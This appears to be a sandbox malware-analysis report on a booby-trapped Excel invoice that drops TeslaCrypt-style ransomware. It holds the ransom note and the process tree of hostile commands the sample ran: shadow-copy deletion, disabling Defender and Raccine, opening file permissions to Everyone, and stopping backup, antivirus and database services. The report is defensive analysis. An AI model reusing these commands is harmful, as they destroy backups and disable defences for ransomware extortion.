teslacrypt | c7e40628fb6beb52d9d73a3b3afd1dca5d2335713593b698637e1a47b42bfc71

Analysis

max time kernel
150s
max time network
129s
platform
windows10_x64
resource
win10v20201028
submitted
22-01-2021 07:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

invoice_NQ_Supply.xls
Size

83KB
MD5

50fecec126570e4b8fcd531d6711879a
SHA1

9166aee4a6815e4f67e0ae43344d8ca144958d47
SHA256

c7e40628fb6beb52d9d73a3b3afd1dca5d2335713593b698637e1a47b42bfc71
SHA512

5f6d88626024811fd05af98d35a2e54a87ce5c8929d56c8bc49d718417b3370af7aa9a66c46007c600c5ec608a0f91f1e952738ee35cd3aebe28b4db46a2c042

Score

10^/10

teslacrypt discovery evasion ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

Don't worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. We also downloaded your corporate files (databases, tables, accounting information, etc.) and we will have to publish them if you do not agree to cooperation. To get this software you need write on our e-mail: workplus111@protonmail.com Reserve e-mail address to contact us: worker400@airmail.cc Key Identifier: KPZ/CMgT0KiODRTwt2zSKOkxl3cDK+8DyFNytpYegKyHmo18iqtQz+v0/qiFXBi4RBsdSyzYNlvcXQelASvyF4U1ZE77C1oJPpdW/wNoE8jrds3OYW4tYjFI7H9g3xh0fOBa4tagyZZu8etC6YN7brgKN6A70yPO0lRobkQ7KR0aibiZTijL35MX47051zbQySUQKYdk2Wh3oa2H0WXumh/SV/A/Rtig0qjYLozuo2LlKRYBFoLJdqGSPDpfdqklm47j3ZasKaG/irZOTqYFPZF+g7Fnpm+yrlEHZjeRRXoKFsxl0+xth7YEfKEsjFAIngrD0iG33sgJRtbQ2nv1cy1zi5nT96dqll72IIsUIm6tGEwzf6Gsq6svheSVscECVidJT61lDV97f3mOMd/FUWWnW+2hyulFXpEhjfHZ/gAPWZIWVx/gqsn7/cLMy4hFvxzdILTCHxIQ1VkarJ9TCUGDJlUGgCO/t5mYxGZ8hpon+4DFZUOF61yJlNp0WkbBFeXD1vRaleQ5nQdhejvWJzBAvPphn8PzArG20YmRw1ObVQTxDJH/bzte6gw39t/0HhIE61OJjErr/JPlICwBj81BPQgiiZatvn66i4erS+ppWkU0alWa9o0YIpMYluv8R/YErOWwqniI8QOe5j+XAPWZi8cB7Jz1x9Rj7Tn0hxw=

Emails

workplus111@protonmail.com

worker400@airmail.cc

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
ransomware teslacrypt
Executes dropped EXE 2 IoCs

Processes:

GZTJoxx.exewqm58yk7.exe

pid process

4468 GZTJoxx.exe
4512 wqm58yk7.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Drops startup file 1 IoCs

Processes:

wqm58yk7.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk wqm58yk7.exe
Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

7300 icacls.exe
7320 icacls.exe
7312 icacls.exe

pid	process
4468	GZTJoxx.exe
4512	wqm58yk7.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	wqm58yk7.exe

pid	process
7300	icacls.exe
7320	icacls.exe
7312	icacls.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

wqm58yk7.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	wqm58yk7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	wqm58yk7.exe

Drops file in Windows directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\Logs\DISM\dism.log powershell.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\Logs\DISM\dism.log	powershell.exe

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\wCmfmRe\dtwzrQf\GZTJoxx.exe	nsis_installer_1
C:\wCmfmRe\dtwzrQf\GZTJoxx.exe	nsis_installer_2
C:\wCmfmRe\dtwzrQf\GZTJoxx.exe	nsis_installer_1
C:\wCmfmRe\dtwzrQf\GZTJoxx.exe	nsis_installer_2

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

14944 net.exe

pid	process
14944	net.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
9176	taskkill.exe
9104	taskkill.exe
9084	taskkill.exe
8912	taskkill.exe
8432	taskkill.exe
8384	taskkill.exe
4648	taskkill.exe
9136	taskkill.exe
8924	taskkill.exe
8452	taskkill.exe
9184	taskkill.exe
9144	taskkill.exe
9052	taskkill.exe
9016	taskkill.exe
9000	taskkill.exe
8440	taskkill.exe
8424	taskkill.exe
8400	taskkill.exe
9160	taskkill.exe
8348	taskkill.exe
9120	taskkill.exe
8980	taskkill.exe
8376	taskkill.exe
8312	taskkill.exe
8244	taskkill.exe
8196	taskkill.exe
9152	taskkill.exe
8948	taskkill.exe
8884	taskkill.exe
8332	taskkill.exe
8264	taskkill.exe
9128	taskkill.exe
9192	taskkill.exe
9112	taskkill.exe
9068	taskkill.exe
9028	taskkill.exe
8224	taskkill.exe
9208	taskkill.exe
9008	taskkill.exe
8972	taskkill.exe
8940	taskkill.exe
8416	taskkill.exe
8408	taskkill.exe
8212	taskkill.exe
8204	taskkill.exe
9200	taskkill.exe
8964	taskkill.exe
9168	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4660 reg.exe
Runs net.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4688 EXCEL.EXE

pid	process
4660	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

wqm58yk7.exe

pid	process
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe
4512	wqm58yk7.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

wqm58yk7.exepowershell.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4512	wqm58yk7.exe
Token: SeDebugPrivilege	640	powershell.exe
Token: SeDebugPrivilege	4648	taskkill.exe
Token: SeDebugPrivilege	1500	powershell.exe
Token: SeDebugPrivilege	9104	taskkill.exe
Token: SeDebugPrivilege	8400	taskkill.exe
Token: SeDebugPrivilege	8212	taskkill.exe
Token: SeDebugPrivilege	9136	taskkill.exe
Token: SeDebugPrivilege	8416	taskkill.exe
Token: SeDebugPrivilege	9152	taskkill.exe
Token: SeDebugPrivilege	8440	taskkill.exe
Token: SeDebugPrivilege	8948	taskkill.exe
Token: SeDebugPrivilege	9084	taskkill.exe
Token: SeDebugPrivilege	9184	taskkill.exe
Token: SeDebugPrivilege	8884	taskkill.exe
Token: SeDebugPrivilege	9000	taskkill.exe
Token: SeDebugPrivilege	9068	taskkill.exe
Token: SeDebugPrivilege	9120	taskkill.exe
Token: SeDebugPrivilege	9016	taskkill.exe
Token: SeDebugPrivilege	8384	taskkill.exe
Token: SeDebugPrivilege	8348	taskkill.exe
Token: SeDebugPrivilege	8224	taskkill.exe
Token: SeDebugPrivilege	8312	taskkill.exe
Token: SeDebugPrivilege	9008	taskkill.exe
Token: SeDebugPrivilege	9168	taskkill.exe
Token: SeDebugPrivilege	9128	taskkill.exe
Token: SeDebugPrivilege	8972	taskkill.exe
Token: SeDebugPrivilege	9144	taskkill.exe
Token: SeDebugPrivilege	9160	taskkill.exe
Token: SeDebugPrivilege	8408	taskkill.exe
Token: SeDebugPrivilege	8424	taskkill.exe
Token: SeDebugPrivilege	9200	taskkill.exe
Token: SeDebugPrivilege	9192	taskkill.exe
Token: SeDebugPrivilege	9112	taskkill.exe
Token: SeDebugPrivilege	8964	taskkill.exe
Token: SeDebugPrivilege	9028	taskkill.exe
Token: SeDebugPrivilege	8332	taskkill.exe
Token: SeDebugPrivilege	8452	taskkill.exe
Token: SeDebugPrivilege	9208	taskkill.exe
Token: SeDebugPrivilege	8980	taskkill.exe
Token: SeDebugPrivilege	8204	taskkill.exe
Token: SeDebugPrivilege	8196	taskkill.exe
Token: SeDebugPrivilege	9052	taskkill.exe
Token: SeDebugPrivilege	8912	taskkill.exe
Token: SeDebugPrivilege	8432	taskkill.exe
Token: SeDebugPrivilege	9176	taskkill.exe
Token: SeDebugPrivilege	8244	taskkill.exe
Token: SeDebugPrivilege	8376	taskkill.exe
Token: SeDebugPrivilege	8264	taskkill.exe
Token: SeDebugPrivilege	8940	taskkill.exe
Token: SeDebugPrivilege	7384	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

wqm58yk7.exe

pid process

4512 wqm58yk7.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

wqm58yk7.exe

pid process

4512 wqm58yk7.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
4688	EXCEL.EXE
4688	EXCEL.EXE
4688	EXCEL.EXE
4688	EXCEL.EXE
4688	EXCEL.EXE
4688	EXCEL.EXE
4688	EXCEL.EXE
4688	EXCEL.EXE
4688	EXCEL.EXE
4688	EXCEL.EXE
4688	EXCEL.EXE
4688	EXCEL.EXE
4688	EXCEL.EXE
4688	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EXCEL.EXEGZTJoxx.exewqm58yk7.exe

description	pid	process	target process
PID 4688 wrote to memory of 4468	4688	EXCEL.EXE	GZTJoxx.exe
PID 4688 wrote to memory of 4468	4688	EXCEL.EXE	GZTJoxx.exe
PID 4688 wrote to memory of 4468	4688	EXCEL.EXE	GZTJoxx.exe
PID 4468 wrote to memory of 4512	4468	GZTJoxx.exe	wqm58yk7.exe
PID 4468 wrote to memory of 4512	4468	GZTJoxx.exe	wqm58yk7.exe
PID 4468 wrote to memory of 4512	4468	GZTJoxx.exe	wqm58yk7.exe
PID 4512 wrote to memory of 640	4512	wqm58yk7.exe	powershell.exe
PID 4512 wrote to memory of 640	4512	wqm58yk7.exe	powershell.exe
PID 4512 wrote to memory of 640	4512	wqm58yk7.exe	powershell.exe
PID 4512 wrote to memory of 4648	4512	wqm58yk7.exe	taskkill.exe
PID 4512 wrote to memory of 4648	4512	wqm58yk7.exe	taskkill.exe
PID 4512 wrote to memory of 4648	4512	wqm58yk7.exe	taskkill.exe
PID 4512 wrote to memory of 4652	4512	wqm58yk7.exe	reg.exe
PID 4512 wrote to memory of 4652	4512	wqm58yk7.exe	reg.exe
PID 4512 wrote to memory of 4652	4512	wqm58yk7.exe	reg.exe
PID 4512 wrote to memory of 4660	4512	wqm58yk7.exe	reg.exe
PID 4512 wrote to memory of 4660	4512	wqm58yk7.exe	reg.exe
PID 4512 wrote to memory of 4660	4512	wqm58yk7.exe	reg.exe
PID 4512 wrote to memory of 2364	4512	wqm58yk7.exe	schtasks.exe
PID 4512 wrote to memory of 2364	4512	wqm58yk7.exe	schtasks.exe
PID 4512 wrote to memory of 2364	4512	wqm58yk7.exe	schtasks.exe
PID 4512 wrote to memory of 2480	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 2480	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 2480	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 220	4512	wqm58yk7.exe	cmd.exe
PID 4512 wrote to memory of 220	4512	wqm58yk7.exe	cmd.exe
PID 4512 wrote to memory of 220	4512	wqm58yk7.exe	cmd.exe
PID 4512 wrote to memory of 200	4512	wqm58yk7.exe	cmd.exe
PID 4512 wrote to memory of 200	4512	wqm58yk7.exe	cmd.exe
PID 4512 wrote to memory of 200	4512	wqm58yk7.exe	cmd.exe
PID 4512 wrote to memory of 4540	4512	wqm58yk7.exe	netsh.exe
PID 4512 wrote to memory of 4540	4512	wqm58yk7.exe	netsh.exe
PID 4512 wrote to memory of 4540	4512	wqm58yk7.exe	netsh.exe
PID 4512 wrote to memory of 2944	4512	wqm58yk7.exe	netsh.exe
PID 4512 wrote to memory of 2944	4512	wqm58yk7.exe	netsh.exe
PID 4512 wrote to memory of 2944	4512	wqm58yk7.exe	netsh.exe
PID 4512 wrote to memory of 2696	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 2696	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 2696	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 1496	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 1496	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 1496	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 2108	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 2108	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 2108	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 4800	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 4800	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 4800	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 5088	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 5088	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 5088	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 1940	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 1940	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 1940	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 3616	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 3616	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 3616	4512	wqm58yk7.exe	sc.exe
PID 4512 wrote to memory of 3484	4512	wqm58yk7.exe	net.exe
PID 4512 wrote to memory of 3484	4512	wqm58yk7.exe	net.exe
PID 4512 wrote to memory of 3484	4512	wqm58yk7.exe	net.exe
PID 4512 wrote to memory of 3176	4512	wqm58yk7.exe	net.exe
PID 4512 wrote to memory of 3176	4512	wqm58yk7.exe	net.exe
PID 4512 wrote to memory of 3176	4512	wqm58yk7.exe	net.exe
PID 4512 wrote to memory of 3552	4512	wqm58yk7.exe	net.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\invoice_NQ_Supply.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4688

C:\wCmfmRe\dtwzrQf\GZTJoxx.exe
"C:\wCmfmRe\dtwzrQf\GZTJoxx.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4468

C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe
"C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe"
3⤵
- Executes dropped EXE
- Drops startup file
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4512

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:640

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4648

C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
4⤵
- Modifies registry key
PID:4660

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
4⤵
PID:2364

C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
4⤵
PID:2480

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
4⤵
PID:200

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
4⤵
PID:2944

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
4⤵
PID:4800

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
4⤵
PID:1940

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:3524

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
4⤵
PID:3616

C:\Windows\SysWOW64\net.exe
"net.exe" start Dnscache /y
4⤵
PID:3484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Dnscache /y
5⤵
PID:4452

C:\Windows\SysWOW64\net.exe
"net.exe" start SSDPSRV /y
4⤵
PID:3176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
5⤵
PID:1392

C:\Windows\SysWOW64\net.exe
"net.exe" start upnphost /y
4⤵
PID:3552

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start upnphost /y
5⤵
PID:2212

C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
4⤵
PID:4428

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
5⤵
PID:1800

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
4⤵
PID:1580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
5⤵
PID:3920

C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
4⤵
PID:2188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
5⤵
PID:4972

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
4⤵
PID:532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
5⤵
PID:3300

C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
4⤵
PID:1780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
5⤵
PID:4868

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
4⤵
PID:1144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
5⤵
PID:3568

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
4⤵
PID:892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
5⤵
PID:1296

C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
4⤵
PID:2104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
5⤵
PID:3604

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQL_2008 /y
4⤵
PID:4144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
5⤵
PID:5696

C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
4⤵
PID:4036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
5⤵
PID:7584

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
4⤵
PID:3256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
5⤵
PID:9604

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
4⤵
PID:1100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
5⤵
PID:7416

C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
4⤵
PID:4544

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
5⤵
PID:9596

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
4⤵
PID:2924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
5⤵
PID:10924

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
4⤵
PID:5216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
5⤵
PID:11760

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
4⤵
PID:6768

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
5⤵
PID:15036

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetMsmqActivator /y
4⤵
PID:7992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
5⤵
PID:14088

C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
4⤵
- Modifies file permissions
PID:7300

C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
4⤵
- Modifies file permissions
PID:7320

C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
4⤵
- Modifies file permissions
PID:7312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:7384

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9208

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9200

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9192

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9184

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9176

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9168

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9160

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9152

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9144

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9136

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9128

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9120

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9112

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9104

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9084

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9068

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9052

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9028

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9016

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9008

